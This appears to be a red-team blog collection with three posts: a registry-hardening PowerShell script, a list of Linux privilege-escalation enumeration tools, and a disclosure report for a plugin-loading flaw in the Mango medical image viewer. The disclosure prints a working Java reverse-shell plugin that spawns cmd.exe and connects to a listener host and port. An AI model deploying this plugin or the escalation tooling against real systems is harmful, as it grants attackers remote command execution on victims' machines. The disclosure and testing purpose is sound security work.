PowerShell Script to set Security Settings
RedTeam Reading time ~2 minutes

This is a script which can be used to check and set certain registry keys. The defaults are geared toward enforcing security settings which are recommended by Defender and where Intune options may be lacking.

The defaults below:

  • Disable Flash (bEnableFlash = 0) in Acrobat Reader DC, Acrobat DC, Acrobat 11
  • Disable JavaScript (bDisableJavaScript = 1) in Acrobat Reader DC, Acrobat DC, Acrobat 11, Acrobat 2017
  • Disable Chrome’s Background Mode (BackgroundModeEnabled = 0)
  • Ensure RDP uses TLS (SecurityLayer = 2)

Flow:

If the KeyPath does not exist, the script exits.

If the KeyPath does exist but the KeyName does not, then a key with the KeyName is created and the value set.

If both the KeyPath and KeyName exist but the value differs then the registry value is changed to that dictated by the script below.

# Name: SecRegSettings.ps1
#
# About: This script will take a HashTable array made up of secure reg settings and loop through them.
#        The script will check if the path exists, if so it will check if the item property exists. If
#        the item property does not exist, it will create it.
#
# Arguments: @( [Ordered]@{KeyPath=<String>; KeyName=<String>; Value=<String>; Type=<String>} )
#
# KeyPath: Registry path which contains the key you want to ensure has a certain value
# KeyName: The name of the key which holds the value you want to check/settings
# Value: The value the key should be
# Type: The data type of the value
#
# Version: 1.0
# Date: 2022-07-31

#Configure the HashTable Array:

$regdata = @(
                [Ordered]@{KeyPath="HKLM:\SOFTWARE\Policies\Adobe\Acrobat Reader\DC\FeatureLockDown";KeyName="bEnableFlash";Value="0";Type="DWord"},
                [Ordered]@{KeyPath="HKLM:\SOFTWARE\Policies\Adobe\Acrobat Reader\DC\FeatureLockDown";KeyName="bDisableJavaScript";Value="1";Type="DWord"},
                [Ordered]@{KeyPath="HKLM:\SOFTWARE\Policies\Adobe\Adobe Acrobat\DC\FeatureLockDown";KeyName="bDisableJavaScript";Value="1";Type="DWord"},
                [Ordered]@{KeyPath="HKLM:\SOFTWARE\Policies\Adobe\Adobe Acrobat\DC\FeatureLockDown";KeyName="bEnableFlash";Value="0";Data="DWord"},
                [Ordered]@{KeyPath="HKLM:\SOFTWARE\Policies\Adobe\Adobe Acrobat\11.0\FeatureLockDown";KeyName="bDisableJavaScript";Value="1";Type="DWord"},
                [Ordered]@{KeyPath="HKLM:\SOFTWARE\Policies\Adobe\Adobe Acrobat\11.0\FeatureLockDown";KeyName="bEnableFlash";Value="0";Type="DWord"},
                [Ordered]@{KeyPath="HKLM:\SOFTWARE\Policies\Adobe\Acrobat\2017\FeatureLockDown";KeyName="bDisableJavaScript";Value="1";Type="DWord"},
                [Ordered]@{KeyPath="HKLM:\SOFTWARE\Policies\Google\Chrome";KeyName="BackgroundModeEnabled";Value="0";Type="DWord"},
                [Ordered]@{KeyPath="HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp";KeyName="SecurityLayer";Value="2";Type="DWord"}
            )

# End Config

# Loop through HashTable Array
For ($i=0; $i -lt $regdata.Length; $i++) {

    # Does reg path exist?
    if(Test-Path -Path $regdata[$i].KeyPath) {

        $item = Get-ItemProperty  -Path $regdata[$i].KeyPath -Name $regdata[$i].KeyName -ErrorAction SilentlyContinue

        # Does item alreaday exist in the path?
        if( !($item) ) {

            # If item does NOT exist, create it with value defined in HashTable
            New-ItemProperty -Path $regdata[$i].KeyPath  -Name $regdata[$i].KeyName -Value $regdata[$i].Value -PropertyType $regdata[$i].Type

        } else {

            # If item DOES exist, check to ensure value is set to what HashTable says it should be
            if ( (Get-ItemPropertyValue -Path $regdata[$i].KeyPath -Name $regdata[$i].KeyName) -ne $regdata[$i].Value ) {

                # If the reg value differs from the expected value, set the value as defined in the HashTable
                Set-ItemProperty -Path $regdata[$i].KeyPath -Name $regdata[$i].KeyName -Value $regdata[$i].Value

            } #end set property if

        } #end check item if

    } #end path check if

} #end for loop
Linux Enumeration
RedTeam Reading time ~2 minutes

Once access is established typically the next step will be enumerating the system to learn what is present, what resources are accessible and what the attack surface looks like.

This page details a couple of the most popular Linux scripts which automate this task. For CTF events these scripts can provide quick useful information, however in a real world engagement beware that these scripts will create a lot of “noise.” However, these scripts can provide a foundation / basis for creating customized scripts.

Linux Smart Enumeration (LSE)

Linux enumeration tools for pentesting and CTFs

Project Page: https://github.com/diego-treitos/linux-smart-enumeration

The LSE project was inspired by https://github.com/rebootuser/LinEnum and uses many of its tests. Unlike LinEnum, lse tries to gradually expose the information depending on its importance from a privesc point of view.

Use: ./lse.sh [options]

 OPTIONS
  -c           Disable color
  -i           Non interactive mode
  -h           This help
  -l LEVEL     Output verbosity level
                 0: Show highly important results. (default)
                 1: Show interesting results.
                 2: Show all gathered information.
  -s SELECTION Comma separated list of sections or tests to run. Available
               sections:
                 usr: User related tests.
                 sud: Sudo related tests.
                 fst: File system related tests.
                 sys: System related tests.
                 sec: Security measures related tests.
                 ret: Recurren tasks (cron, timers) related tests.
                 net: Network related tests.
                 srv: Services related tests.
                 pro: Processes related tests.
                 sof: Software related tests.
                 ctn: Container (docker, lxc) related tests.
                 cve: CVE related tests.
               Specific tests can be used with their IDs (i.e.: usr020,sud)
  -e PATHS     Comma separated list of paths to exclude. This allows you
               to do faster scans at the cost of completeness
  -p SECONDS   Time that the process monitor will spend watching for
               processes. A value of 0 will disable any watch (default: 60)
  -S           Serve the lse.sh script in this host so it can be retrieved
               from a remote host.

Proof of concept on how to get LSE on a remote system:

RootHelper

Project Page: https://github.com/NullArray/RootHelper

Roothelper will aid in the process of privilege escalation on a Linux system that has been compromised. The latest version totals eleven scripts. From enumeration to exploit suggestion to exploit deployment. RootHelper ensures you have access to the best tools for the job.

SUID3NUM

Project Page: https://github.com/Anon-Exploiter/SUID3NUM

A standalone script supporting both python2 & python3 to find out all SUID binaries in machines/CTFs and do the following

  • List all Default SUID Binaries (which ship with Linux/aren’t exploitable)
  • List all Custom Binaries (which don’t ship with packages/vanilla installation)
  • List all custom binaries found in GTFO Bin’s (This is where things get interesting)
  • Printing binaries and their exploitation (in case they create files on the machine)
  • Try and exploit found custom SUID binaries which won’t impact machine’s files

uptux

Project Page: https://github.com/initstring/uptux

Specialized privilege escalation checks for Linux systems.

Implemented so far:

  • Writable systemd paths, services, timers, and socket units
    • Disassembles systemd unit files looking for:
      • References to executables that are writable
      • References to broken symlinks pointing to writeable directories
      • Relative path statements
      • Unix socket files that are writeable (sneaky APIs)
  • Writable D-Bus paths
  • Overly permissive D-Bus service settings
  • HTTP APIs running as root and responding on file-bound Unix domain sockets
Mango Vulnerability Disclosure Report
RedTeam Reading time ~4 minutes

Mango – short for Multi-image Analysis GUI – is a viewer for medical research images. It provides analysis tools and a user interface to navigate image volumes.

source: https://ric.uthscsa.edu/mango/index.html

Content

Versioning

Version Date Author Comment
1.0 2022-06-13 Jo Initial document
1.1 2022-07-31 Jo Added CVE-2022-34567

Disclosure Timeline

Disclosure followed 90-day timeline used by Google’s Project Zero

Date Comment
2022-03-22 UT’s Information Security Office notified via email, response was to contact UTHSCSA’s Security Team (provided with email).
2022-03-22 UTHSCSA Security Team notified via email. Advised of responsible disclosure
2022-03-23 UTHSCSA Security Team sent update via email (note: this was a unilateral action, no response from UTHSCSA had been received.)
2022-06-22 Vulnerability reported to MITRE.
2022-06-22 Vulnerability published publicly.
2022-07-28 CVE-2022-34567

Application Details

Vulnerability: Insecure Plugin Use/Implementation.

Overview: Mango allows 3rd party developed plugins to be used. The product page contains a list of some plugins that have been developed. Mango plugins are written in Java, as a platform-agnostic language, Java gives developers a lot of control over the operating system. Mango does no plugin validation, or provides any notice to users if “new” plugins were to be added. In short, any properly crafted plugin added to the plugin folder (user writable) will automatically be loaded by Mango and executed. This can result in a threat actor crafting a malicious plugin that, if deployed, would result in a threat actor achieving remote access with the same rights as the user running Mango.

Details: Assessor created a customized plugin and deployed and deployed on a Windows test environment. The plugin was designed to integrate into Mango and, once loaded, would establish a connection (“reverse shell”) back to a remote testing computer (“attacker”).

Two tests were attempted and succeeded. Both attempts involved crafting a customized plugin (we named “Evil Plugin”) and with user-level permissions moving Evil Plugin into C:\Users\<user name>\AppData\Roaming\Mango\Plugins. One attempt created a reverse shell to a remote computer the other test executed Calculator to demonstrate the ability to execute code on the system.

Screenshot showing pre and post move folder / results

The above image shows we started off with an empty plugin folder. With the Evil Plugin on the Desktop. We then move the plugin from the Desktop to the plugin folder. No errors are encountered. We then load Mango and observed the settings, the Evil Plugin was loaded.

Reverse Shell - Victim side post execution. Reverse Shell - Attacker side post execution. Calculator Execution

Plugin Proof of Concept Code

package edu.uthscsa.ric.plugins.mangoplugin;

import java.net.URL;
import edu.uthscsa.ric.mango.MangoContext;
import edu.uthscsa.ric.mango.MangoData;
import edu.uthscsa.ric.mango.MangoPlugin;
import edu.uthscsa.ric.mango.ViewerController;
import edu.uthscsa.ric.mango.viewerslice.VolumeManager;
import edu.uthscsa.ric.volume.ImageVolume;

public class ExamplePlugin implements MangoPlugin {

	@Override
	public void doOperation(MangoContext mango, VolumeManager viewer) {

		String host="10.1.1.2";
		String cmd="cmd.exe";
		int port=4444;

		Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
		Socket s = new Socket(host,port);
		InputStream pi = p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();
		OutputStream po = p.getOutputStream(),so=s.getOutputStream();
		while(!s.isClosed()) {
			while(pi.available()>0)
				so.write(pi.read());
			while(pe.available()>0)
				so.write(pe.read());
			while(si.available()>0)
				po.write(si.read());
			so.flush();
			po.flush();
			Thread.sleep(50);
			try {
				p.exitValue();
				break;
			}catch (Exception e){}
		};
		p.destroy();
		s.close();
	}

	@Deprecated
	@Override
	public void doOperation(MangoData data, ViewerController controller) { }

	@Override
	public String getMinimumVersionSupported() { return null; }

	@Override
	public String getPluginName() { return "My Reverse Shell Plugin"; }

	@Override
	public URL getPluginURL() { return null; }

	@Override
	public String getVersion() { return null; }

	@Override
	public boolean hasNewerVersion() { return false; }
}

Observed Common Weakness Enumeration (CWE)

CWE Name Common Consequences Description
CWE-345 Insufficient Verification of Data Authenticity Varies by Context The software does not sufficiently verify the origin or authenticity of data, in a way that causes it to accept invalid data.
CWE-346 Origin Validation Error An attacker can access any functionality that is inadvertently accessible to the source. The software does not properly verify that the source of data or communication is valid.
CWE-358 Improperly Implemented Security Check for Standard Bypass Protection Mechanism The software does not implement or incorrectly implements one or more security-relevant checks as specified by the design of a standardized algorithm, protocol, or technique.
CWE-829 Inclusion of Functionality from Untrusted Control Sphere An attacker could insert malicious functionality into the program by causing the program to download code that the attacker has placed into the untrusted control sphere. The software imports, requires, or includes executable functionality (such as a library) from a source that is outside of the intended control sphere.

Implications & Threat

According to Google Scholar, Multi-image Analysis GUI (Mango) returns 298 results, spanning a time range from 2018 - 2022 (Accessed: 2022-06-22). There are many potential attack scenarios where having the ability to quietly insert a plugin into a research tool could be leveraged to further a threat actor’s aims.

One example to highlight the above point would be:

  1. A threat actor targeting researchers (or organizations) conducts open source intelligence reconnaissance and compiles a list of cited software used by key targets.
  2. The threat actor discovers Multi-image Analysis GUI (Mango) permits the loading of modules without user interaction or notice and further custom modules could be crafted to achieve code execution.
  3. The threat actor crafts a social engineering campaign which induces the target to: open a malicious document, file, or otherwise unknowingly start a process which drops a malicious modules
  4. The target, perhaps as part of the social engineering campaign, or otherwise, runs Mango. At this point the malicious payload could be unknowingly executed moving the threat actor closer to achieving their goal.